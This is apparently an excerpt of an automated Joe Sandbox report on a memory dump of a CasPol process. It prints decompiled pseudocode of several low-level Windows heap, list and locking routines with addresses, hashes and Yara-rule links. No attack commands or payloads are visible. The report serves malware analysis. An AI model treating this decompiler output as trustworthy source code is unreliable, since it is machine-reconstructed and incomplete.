					if(E013D7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E013D7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E013D7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01437794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                        0x013dae78
                                                                        0x013dae7c
                                                                        0x013dae7e
                                                                        0x013dae81
                                                                        0x013dae86
                                                                        0x013dae8d
                                                                        0x01422691
                                                                        0x013dae93
                                                                        0x013dae93
                                                                        0x013dae93
                                                                        0x013dae98
                                                                        0x013dae9d
                                                                        0x014226a2
                                                                        0x014226b4
                                                                        0x014226a4
                                                                        0x014226ad
                                                                        0x014226ad
                                                                        0x014226b9
                                                                        0x00000000
                                                                        0x014226bb
                                                                        0x00000000
                                                                        0x014226bb
                                                                        0x013daea3
                                                                        0x013daea3
                                                                        0x013daea3
                                                                        0x013daeaa
                                                                        0x014226c0
                                                                        0x014226c9
                                                                        0x014226c9
                                                                        0x013daeb3
                                                                        0x014226d4
                                                                        0x014226e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014226e7
                                                                        0x014226ee
                                                                        0x014226f0
                                                                        0x014226f9
                                                                        0x014226f9
                                                                        0x01422702
                                                                        0x01422708
                                                                        0x01422708
                                                                        0x0142270b
                                                                        0x0142270f
                                                                        0x01422711
                                                                        0x01422711
                                                                        0x01422725
                                                                        0x01422725
                                                                        0x00000000
                                                                        0x013daeb9
                                                                        0x013daeb9
                                                                        0x013daebf
                                                                        0x013daebf
                                                                        0x013daeb3

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                        • Instruction ID: d7aafde8ec186b0fc8dba10ec5e75fa7f585892621b6d306087fe8fbb6d50053
                                                                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                        • Instruction Fuzzy Hash: 412126736016958FE7269B2CDA44F2637E8EF45348F4900A1DD088B7A2D7B4DC80C690
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EFD9B Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E013EFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E013C76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                        0x013efd9b
                                                                        0x013efda0
                                                                        0x013efda1
                                                                        0x013efdab
                                                                        0x013efdad
                                                                        0x013efdb0
                                                                        0x013efdb8
                                                                        0x013efe0f
                                                                        0x013efde6
                                                                        0x013efde9
                                                                        0x013efdec
                                                                        0x0142c0c0
                                                                        0x013efdfe
                                                                        0x013efe06
                                                                        0x013efe06
                                                                        0x0142c0c8
                                                                        0x013efe2d
                                                                        0x013efe2d
                                                                        0x00000000
                                                                        0x013efe2d
                                                                        0x0142c0d1
                                                                        0x0142c0e0
                                                                        0x0142c0e5
                                                                        0x0142c0e5
                                                                        0x0142c0e8
                                                                        0x00000000
                                                                        0x0142c0e8
                                                                        0x013efdf4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013efdf6
                                                                        0x013efdfa
                                                                        0x013efe1a
                                                                        0x013efe1f
                                                                        0x013efe1f
                                                                        0x013efdfc
                                                                        0x00000000
                                                                        0x013efdfc
                                                                        0x013efdcc
                                                                        0x013efdd0
                                                                        0x013efe26
                                                                        0x00000000
                                                                        0x013efe26
                                                                        0x013efdd8
                                                                        0x013efddb
                                                                        0x013efddd
                                                                        0x013efde0
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                        • Instruction ID: 05a34fedac393d144fc28a2dd33a390efd72ba6cd80e388ac6743c30ec159b31
                                                                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                        • Instruction Fuzzy Hash: 2A21A972A00B54DBD731CF4DC544A66FBEDEB94A18F20806EE94997B65D771EC00CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013C841F Relevance: .1, Instructions: 64COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E013C841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E013F9810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}













                                                                        0x013c842f
                                                                        0x013c8448
                                                                        0x013c844e
                                                                        0x013c8459
                                                                        0x013c845b
                                                                        0x013c8464
                                                                        0x01419ac3
                                                                        0x01419ac3
                                                                        0x01419ac5
                                                                        0x01419acb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01419acd
                                                                        0x01419acd
                                                                        0x01419ad1
                                                                        0x01419ae9
                                                                        0x013c846a
                                                                        0x013c8475
                                                                        0x013c8479
                                                                        0x013c847c
                                                                        0x013c8481
                                                                        0x013c8482
                                                                        0x013c849a

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                        • Instruction ID: d2247a39b45980258ecc7f8201d5ee9c95794cde69bd55fbf239ac379629f687
                                                                        • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                        • Instruction Fuzzy Hash: BA219072E00119CBCB14CFA9C58069AF7F9FB88350F664165E909B7354C630AE04CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EB390 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E013EB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E013D2280(_t12, 0x14a8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E013F00C2(0x14a8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                        0x013eb395
                                                                        0x013eb3a2
                                                                        0x013eb3a5
                                                                        0x013eb3aa
                                                                        0x013eb3b2
                                                                        0x013eb3ba
                                                                        0x013eb3bd
                                                                        0x013eb3c0
                                                                        0x013eb3c4
                                                                        0x013eb3c9
                                                                        0x0142a3e9
                                                                        0x0142a3ed
                                                                        0x0142a3f0
                                                                        0x0142a3ff
                                                                        0x0142a403
                                                                        0x0142a409
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142a40b
                                                                        0x0142a40b
                                                                        0x0142a40f
                                                                        0x0142a415
                                                                        0x0142a423
                                                                        0x0142a423
                                                                        0x0142a415
                                                                        0x013eb3d1
                                                                        0x013eb3e8
                                                                        0x013eb3e8
                                                                        0x013eb3d9

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 316f58d54e314fbc8e4fc723b58aa07bd7f6a26bc6cbf8b83b4d2d1892b30269
                                                                        • Instruction ID: cdfd83f549d6d979621b8ee0ace931fbd2218e33c1e42faa925c14ae1010fc49
                                                                        • Opcode Fuzzy Hash: 316f58d54e314fbc8e4fc723b58aa07bd7f6a26bc6cbf8b83b4d2d1892b30269
                                                                        • Instruction Fuzzy Hash: 22116F377012219BDB1A8A189D4162BB2A7EFD5374B79413EDD16C77D0C9319C02C690
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B9240 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E013B9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x148f708);
				E0140D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E013F95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E013F95D0();
				_t33 =  *0x14a84c4; // 0x0
				L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x14a84c4; // 0x0
				L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x14a84c4; // 0x0
				E013D2280(L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x14a86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E013F95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E013F95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E013B9325();
					_t50 =  *0x14a84c4; // 0x0
					return E0140D0D1(L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                        0x013b9240
                                                                        0x013b9242
                                                                        0x013b9247
                                                                        0x013b924c
                                                                        0x013b924e
                                                                        0x013b9255
                                                                        0x013b9257
                                                                        0x013b925a
                                                                        0x013b925f
                                                                        0x013b925f
                                                                        0x013b9266
                                                                        0x013b9271
                                                                        0x013b9276
                                                                        0x013b9279
                                                                        0x013b927e
                                                                        0x013b9295
                                                                        0x013b929a
                                                                        0x013b92b1
                                                                        0x013b92b6
                                                                        0x013b92d7
                                                                        0x013b92dc
                                                                        0x013b92e0
                                                                        0x013b92e6
                                                                        0x013b92e8
                                                                        0x013b92ee
                                                                        0x013b9332
                                                                        0x013b9333
                                                                        0x013b9337
                                                                        0x013b9338
                                                                        0x013b933a
                                                                        0x013b933a
                                                                        0x013b933d
                                                                        0x013b9342
                                                                        0x013b9342
                                                                        0x013b9345
                                                                        0x013b9349
                                                                        0x013b934e
                                                                        0x013b9352
                                                                        0x013b9357
                                                                        0x013b92f4
                                                                        0x013b92f4
                                                                        0x013b92f6
                                                                        0x013b92f9
                                                                        0x013b9300
                                                                        0x013b9306
                                                                        0x013b9324
                                                                        0x013b9324

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f9d21872c3750c5e5b6fa8d9d065c9a8df25142f0bbb1fa1c8fd2810b3548b8c
                                                                        • Instruction ID: c4078073d84ffbd37958ebec46ac084ee88cbae3d4d124d4ed8e945e5c22e7a7
                                                                        • Opcode Fuzzy Hash: f9d21872c3750c5e5b6fa8d9d065c9a8df25142f0bbb1fa1c8fd2810b3548b8c
                                                                        • Instruction Fuzzy Hash: 392139B2441602DFC722EF68CA40F5AB7B9FF2870CF55456DE24986AB2DB34E941CB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01444257 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E01444257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x14908d0);
				E0140D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E014441E8(__ebx, __edi, __ecx, _t39);
				E013CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x14a87e4;
					_t18 =  *0x14a87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x14a5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x14a87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x14a87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L013B7055(_t31 + 0xfffffff8);
								_t24 =  *0x14a87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x14a87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x14a5cd0;
				if( *0x14a5cd0 <= 0) {
					L013B7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x14a87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x14a87e8 = _t30;
						 *0x14a87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0140D0D1(L01444320());
			}















                                                                        0x01444257
                                                                        0x01444257
                                                                        0x01444257
                                                                        0x01444259
                                                                        0x0144425e
                                                                        0x01444263
                                                                        0x01444265
                                                                        0x01444273
                                                                        0x01444278
                                                                        0x0144427c
                                                                        0x0144427f
                                                                        0x01444281
                                                                        0x01444287
                                                                        0x014442d7
                                                                        0x014442d7
                                                                        0x014442da
                                                                        0x0144428d
                                                                        0x0144428d
                                                                        0x0144428f
                                                                        0x01444292
                                                                        0x01444297
                                                                        0x0144429c
                                                                        0x014442a0
                                                                        0x014442a6
                                                                        0x014442a8
                                                                        0x014442ae
                                                                        0x014442b3
                                                                        0x00000000
                                                                        0x014442ba
                                                                        0x014442ba
                                                                        0x014442bf
                                                                        0x014442c5
                                                                        0x014442ca
                                                                        0x014442cf
                                                                        0x014442d0
                                                                        0x00000000
                                                                        0x014442d0
                                                                        0x014442b3
                                                                        0x00000000
                                                                        0x014442a6
                                                                        0x0144429c
                                                                        0x014442dc
                                                                        0x014442dc
                                                                        0x014442e3
                                                                        0x01444309
                                                                        0x014442e5
                                                                        0x014442e5
                                                                        0x014442e8
                                                                        0x014442ee
                                                                        0x014442f0
                                                                        0x00000000
                                                                        0x014442f2
                                                                        0x014442f2
                                                                        0x014442f4
                                                                        0x014442f7
                                                                        0x014442f9
                                                                        0x01444300
                                                                        0x01444300
                                                                        0x014442f0
                                                                        0x0144430e
                                                                        0x0144431f

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1eb17cd666862e49afb2127a976ea60a48b117dbe445b1b558f2a56fdc1abfe8
                                                                        • Instruction ID: 7dffa8f47b3f289b471fdc6145dabbb641c15e68c5eabd9fa536a9e1098bb23d
                                                                        • Opcode Fuzzy Hash: 1eb17cd666862e49afb2127a976ea60a48b117dbe445b1b558f2a56fdc1abfe8
                                                                        • Instruction Fuzzy Hash: 68216DB4A00602CFE725DF69D540725BFF1FB95395BA9826FC1098B3B9DB319451CB00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E2397 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 25%
                                                                        			E013E2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x14a848c != 0) {
					L013DFAD0(0x14a8610);
					if( *0x14a848c == 0) {
						E013DFA00(0x14a8610, _t19, _t27, 0x14a8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E013E2581(0x14a8610, 0x13950a0, _t26, _t27, _t28);
						E013DFA00(0x14a8610, 0x13950a0, _t27, 0x14a8610);
					}
				} else {
					L1:
					_t11 =  *0x14a8614; // 0x0
					if(_t11 == 0) {
						_t11 = E013F4886(0x1391088, 1, 0x14a8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E013E2581(0x14a8610, (_t11 << 4) + 0x1395070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                        0x013e23b0
                                                                        0x013e23b6
                                                                        0x013e2409
                                                                        0x013e2415
                                                                        0x01425ae9
                                                                        0x00000000
                                                                        0x013e241b
                                                                        0x013e241b
                                                                        0x013e241d
                                                                        0x013e2427
                                                                        0x013e242e
                                                                        0x013e2430
                                                                        0x013e2430
                                                                        0x013e23b8
                                                                        0x013e23b8
                                                                        0x013e23b8
                                                                        0x013e23bf
                                                                        0x013e23fc
                                                                        0x013e23fc
                                                                        0x013e23c1
                                                                        0x013e23c3
                                                                        0x013e23d0
                                                                        0x013e23d8
                                                                        0x013e23d8
                                                                        0x013e23dc
                                                                        0x013e23de
                                                                        0x013e23e1
                                                                        0x013e23e1
                                                                        0x013e23ec

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30ea74b80829a6641dd7a4053dccc3978db6f21cf3b3f7f41e4d5e8bd0f51fc5
                                                                        • Instruction ID: 11048fb75126054088ee8e0a3291ba051449073698b6de5788ad54b5895442de
                                                                        • Opcode Fuzzy Hash: 30ea74b80829a6641dd7a4053dccc3978db6f21cf3b3f7f41e4d5e8bd0f51fc5
                                                                        • Instruction Fuzzy Hash: 81112B32704366A7F730962DAC88B17BADCFB60629F59402AF607A72D1D6B0D8458B54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014346A7 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E014346A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E013FF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E013ED268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L013D77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                        0x014346b7
                                                                        0x014346ba
                                                                        0x014346c5
                                                                        0x014346c8
                                                                        0x014346d0
                                                                        0x014346d4
                                                                        0x014346e6
                                                                        0x014346e9
                                                                        0x014346f4
                                                                        0x014346ff
                                                                        0x01434705
                                                                        0x01434706
                                                                        0x0143470c
                                                                        0x01434713
                                                                        0x0143471b
                                                                        0x01434723
                                                                        0x01434725
                                                                        0x014346d6
                                                                        0x014346d9
                                                                        0x014346db
                                                                        0x014346db
                                                                        0x01434732

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                        • Instruction ID: 5fee172a074d5bda852f6bfeb95d84fae060d694fe361fe5c8b303084750a714
                                                                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                        • Instruction Fuzzy Hash: 5A11E572504208BBC7059F5CE8809BEB7B9EF99314F10806EF944CB351DA358E55D7A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BC962 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 42%
                                                                        			E013BC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x14ad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E013CEEF0(0x14a70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0143F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E013CEB70(_t29, 0x14a70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E013FB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0143F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x14a70c0; // 0x0
					while(_t38 != 0x14a70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x14ab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                        0x013bc96a
                                                                        0x013bc974
                                                                        0x013bc988
